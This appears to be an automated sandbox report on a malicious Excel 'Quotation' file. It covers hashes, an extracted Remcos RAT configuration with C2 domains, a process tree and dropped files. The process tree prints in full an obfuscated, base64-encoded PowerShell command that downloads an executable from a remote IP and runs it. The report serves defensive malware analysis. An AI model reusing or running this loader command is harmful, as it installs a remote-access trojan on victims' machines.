Analysis

  • max time kernel
    148s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    24-07-2024 10:30

General

  • Target

    Quotation.xls

  • Size

    1.0MB

  • MD5

    7a9a6e2a484c942e9247513bf8420f13

  • SHA1

    9a0399a2c75537687cdcaa939adb4a871b56f26e

  • SHA256

    c0484101a8ad9d96190d39f100d6a6ed337873df68eb587c74a91b5cdd19cdd5

  • SHA512

    a48ad2da1dddb561a8a64414a8576e03180dccc65cedb94e4733c1d7dba3f8881230d6ec7bb10fe495e13e5fc7449585f52921f9d05d3d1f41361e0b99ec3d2c

  • SSDEEP

    24576:QCvOsc3umX8S4lMiK4uwQP6DdRgLd5+HKtGboP:QCG2xRISDdRgLQu

Malware Config

Extracted

Family

remcos

Botnet

2556

C2

bossnacarpet.com:2556

vegetachcnc.com:2556

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    chrome-6W1HCC

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Detected phishing page
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Quotation.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1356
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2904
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'JDVYWE5WZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRVJERUZpbml0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdLbU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFljSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1FpSEtBVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtGWmN1cW5tYWNILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYU3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeVVjSHZ3QnF1TWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNVhYTlZlOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDIzMDdXL2NzcnNzLmV4ZSIsIiRFTlY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1NUYXJULVNMZUVwKDMpO3NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcd2luaXRpLmV4ZSI='+[chAR]0x22+'))')))"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2608
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        PowerShEll -EX BYPASs -NOP -w 1 -C DEViCECrEDEntIaldEPLOyment ; IeX($(iex('[sysTem.TeXt.ENCOdIng]'+[chAR]58+[ChAr]0x3a+'Utf8.gETStRIng([sysTEM.COnveRT]'+[cHAr]58+[CHar]0x3A+'frOMbaSe64StRing('+[char]0x22+'JDVYWE5WZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1iRVJERUZpbml0SU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdLbU8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFljSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ1FpSEtBVCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtGWmN1cW5tYWNILEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYU3gpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1Fc3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeVVjSHZ3QnF1TWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNVhYTlZlOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My4xNDMuNDYvVDIzMDdXL2NzcnNzLmV4ZSIsIiRFTlY6QVBQREFUQVx3aW5pdGkuZXhlIiwwLDApO1NUYXJULVNMZUVwKDMpO3NUQXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcd2luaXRpLmV4ZSI='+[chAR]0x22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2760
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wrr7nadr.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1652
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF22.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCF12.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2232
        • C:\Users\Admin\AppData\Roaming\winiti.exe
          "C:\Users\Admin\AppData\Roaming\winiti.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1108
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2884

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NFAY0EOS\gdfc[1].hta

    Filesize

    8KB

    MD5

    5c8152c47be9ca7a398a85d2e51b2505

    SHA1

    34eeba07fe8667b81f14be825223b26006d7d042

    SHA256

    ec3c6a6050bd2e48b86fa5c770b78963ed6f13f5adbd9e96ce86dd81e27ab3cd

    SHA512

    8f4cf39c381f68cb3fe3230823b7a96d2808bae4ec3e44c7a2bd90946264da74736fae170cc0f471049b6e4d5ea9b9518f45a078a191ba401ad7b6d8321bae4a

  • C:\Users\Admin\AppData\Local\Temp\RESCF22.tmp

    Filesize

    1KB

    MD5

    35c7d65fd3c27e01c9579b744902459c

    SHA1

    36491adf9dccab029e8da529632e88fe6d9fab55

    SHA256

    7b1d94b818cd392846cff1ce027e9fdc66430ef99ee4dbad38f77ab8472dd957

    SHA512

    28cc5a69bb7fca63d1b3de271716ef54affe377712cffd878ae14ed1184c2b7fb60ed514de134f1f753bf734cfb0e9f2dfd9930b6868b74d69c46edd0cef844a

  • C:\Users\Admin\AppData\Local\Temp\wrr7nadr.dll

    Filesize

    3KB

    MD5

    930f55e4011c2193939d376948c305ad

    SHA1

    06464223e8a3f1074a858d66f5308c9115639691

    SHA256

    077694a40703c99a0abc8f1dd04de38912a09c4e9a8e937f6c07cf1b221ffcec

    SHA512

    e78f11bf5a8b4a4124769fed5c2f5cfc2b1506412fd9e5f40bb4ef6b1bec7c9522f8cf84a739171b42031e3ec10edfa6ae2b97f8194aa6554ef9de7fdd9056c1

  • C:\Users\Admin\AppData\Local\Temp\wrr7nadr.pdb

    Filesize

    7KB

    MD5

    d861d056a5c35a467b54b45eec5b3f39

    SHA1

    e4e34e26d1800c8b57cffe70c8a3150c29c62162

    SHA256

    5ea37039bff6e70ee7d2db0a8e996bd571b3246d6e4e8da21abb3f641921e4a1

    SHA512

    0fc597035a4ccd1c893c5ca30cc3254e0639acfe60e2159128ce68e5cb4942fc2f9d65fda27072d2739e840999ef47e644437868b120c570a398903d87d3dbe4

  • C:\Users\Admin\AppData\Roaming\winiti.exe

    Filesize

    2.2MB

    MD5

    f6bf8ada032d17192526ffebb48aed79

    SHA1

    362cb802e430115288638c9d613f00412f1b2519

    SHA256

    153e11471f85de3df5135b0445014698333ff40a9d6c488d291d6517eb19800d

    SHA512

    0a2e5dbcc972d8463a3cd0608bb837e232ed1dd909ea7472ade269abb0ae1d9dfbeecefe505caffabefed02af413ee156aa2917f0ac3547f1431183bfa99639c

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCCF12.tmp

    Filesize

    652B

    MD5

    03a5865dc15c5d0f43ced1aee7a8d16e

    SHA1

    81458a58ad5a09f87c5d7b15e4c02dd7a5166555

    SHA256

    be1ac8c1b9aebfbe284e5ecd496a0b3322dddd159517c2d7c34770d179ba269f

    SHA512

    a74181241d37ac5c91766c1122c89cb9bd2e12c24f977fa90ff57b7e5f5fe1f127f8f7182fdd8eee6a3466232dfcec16a68e152c0ef18c15ca265ff8b3fdb428

  • \??\c:\Users\Admin\AppData\Local\Temp\wrr7nadr.0.cs

    Filesize

    461B

    MD5

    a83dc0e46bbad233951be9e3fdba130c

    SHA1

    892cfc6827bb1072ec2e26bbf83457497d6a17cb

    SHA256

    aa9a30262c1a7f73a50a10094b1c5eef9584cd05d275b2ed57430b3431aef967

    SHA512

    e02ef7f32d36925b4064b283c5dfe49b2db6fe0df092be7e3e4b3ba6501b840f4d7d86732f63dc4564514e8aef810edc40b42c982b9fb8356b2e5ab6fe580caa

  • \??\c:\Users\Admin\AppData\Local\Temp\wrr7nadr.cmdline

    Filesize

    309B

    MD5

    b747cdd0ffea5c8ddf7131e17823747f

    SHA1

    41a278eddce8b4771d5b42be18cac33331d2d792

    SHA256

    d6caa87edcd6c6751870a20178feeae84a47f104537deb1d22571441a9ae16cf

    SHA512

    826600fa32ebd9e6fdff00288c2ab0805dd38dc604b4d8835bf148da66711daa7ab5468f92c4b91b39b65f88d1396d65d9d9fcf70703e0de89ff4029dff807a1

  • memory/1356-47-0x00000000728CD000-0x00000000728D8000-memory.dmp

    Filesize

    44KB

  • memory/1356-4-0x00000000030F0000-0x00000000030F2000-memory.dmp

    Filesize

    8KB

  • memory/1356-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

  • memory/1356-1-0x00000000728CD000-0x00000000728D8000-memory.dmp

    Filesize

    44KB

  • memory/2884-43-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2884-50-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2884-38-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2884-39-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2884-40-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2884-41-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2884-42-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2884-36-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2884-44-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2884-54-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2884-48-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2884-49-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2884-51-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2884-37-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2884-52-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2884-53-0x0000000000400000-0x0000000000482000-memory.dmp

    Filesize

    520KB

  • memory/2904-3-0x0000000002970000-0x0000000002972000-memory.dmp

    Filesize

    8KB